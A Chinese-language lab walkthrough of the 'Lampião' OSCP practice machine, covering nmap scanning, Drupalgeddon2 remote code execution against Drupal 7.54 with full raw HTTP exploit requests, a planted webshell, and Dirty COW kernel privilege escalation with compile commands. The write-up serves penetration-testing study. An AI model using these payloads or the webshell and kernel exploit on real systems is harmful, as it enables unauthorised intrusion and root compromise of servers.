前言

oscp靶机系列的第二篇。只追求做出来的话,这靶机蛮简单的。但是为了提升难度,尽量避免使用msf——毕竟考试只准用一次嘛,自己写了个exp。

正文

主机发现

nmap -sP 192.168.218.0/24

发现靶机IP 192.168.218.132

nmap -sV -A -p- 192.168.218.132

Nmap scan report for 192.168.218.132
Host is up (0.00099s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?
80/tcp   open  http?
| fingerprint-strings:
|   NULL:
|     _____ _ _
|     |_|/ ___ ___ __ _ ___ _ _
|     \x20| __/ (_| __ \x20|_| |_
|     ___/ __| |___/ ___|__,_|___/__, ( )
|     |___/
|     ______ _ _ _
|     ___(_) | | | |
|     \x20/ _` | / _ / _` | | | |/ _` | |
|_    __,_|__,_|_| |_|
1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o

访问80端口,只有一个画
1898端口,访问CHANGELOG.txt 得到drupal具体版本号7.54 2017-02-01
看样子能直接打drupalgeddon2 RCE了。
msf果然一把梭哈,留了个小马s.php 密码pass
寻找suid提权
上传Linux-exploit-suggester.sh,脏牛可以提权
有趣的是pocsuite3并没有检测处drupalgeddon2 ,但是msf可以打。让我们好好分析一下

tcpdump -w data.pcap -i eth0 -nn -s0 host 192.168.218.132

抓取msf 打的流量,wireshark 筛选http协议
LamPiao靶机work_through-LMLPHP
再看了分析文章之后可以说很显然了,pocsuite3的只是drupal8的payload,并不包括drupal7

我们手动打一下

POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 47
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=user/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1
Connection: close

_triggering_element_name=name&form_id=user_pass
POST /?q=file/ajax/name/%23default_value/form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls HTTP/1.1
Host: 192.168.218.132:1898
Content-Length: 62
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.218.132:1898
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.218.132:1898/?q=file/ajax/name/%23default_value/form-6JI87Jaq17bIYgG2BkOA_gVnNtWRyJTmwnw1VbqEMp4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1; SESS07faf6555595fd9ed723577c1f01f9ec=rh2r55VofVS2NiqKCduex2bKVZVqXR5Q4ImL6p42ZxM
Connection: close

form_build_id=form-3Q-zKa_nY1PvpbTGthaNXUxmyHAyUnpMmqp_jALevls

翻阅msf的exp和其他公开资料,自己写了一个pocsuite3的exp.
项目地址
成功写入webshell,写的直接弹shell没接到。
LamPiao靶机work_through-LMLPHP

LamPiao靶机work_through-LMLPHP
从虚拟终端反弹shell,发现跟之前的问题一样,ret=2弹不出来——可能是我环境问题吧。msf弄个正向shell

提权

./lnux-exploits-suggester.sh

除了版本还有其他条件的先跳过,高可能的就是dirtycow(40611),dirtycow2(40847)

40611这注释这一段操作没看懂要干嘛

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w

执行结果foo也是www-data权限和它不一样

,用40847吧,这个注释直接给了编译语句,没别的啥

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow

LamPiao靶机work_through-LMLPHP

LamPiao靶机work_through-LMLPHP

后记

msf流量其实还是有些疑惑。在tcp流中看到先写入一个php文件,后续流量都不是明文的。HTTP请求只有截图中的:查看版本,执行了一条命令,但这条命令是printf,是怎么写文件的?

04-06 04:01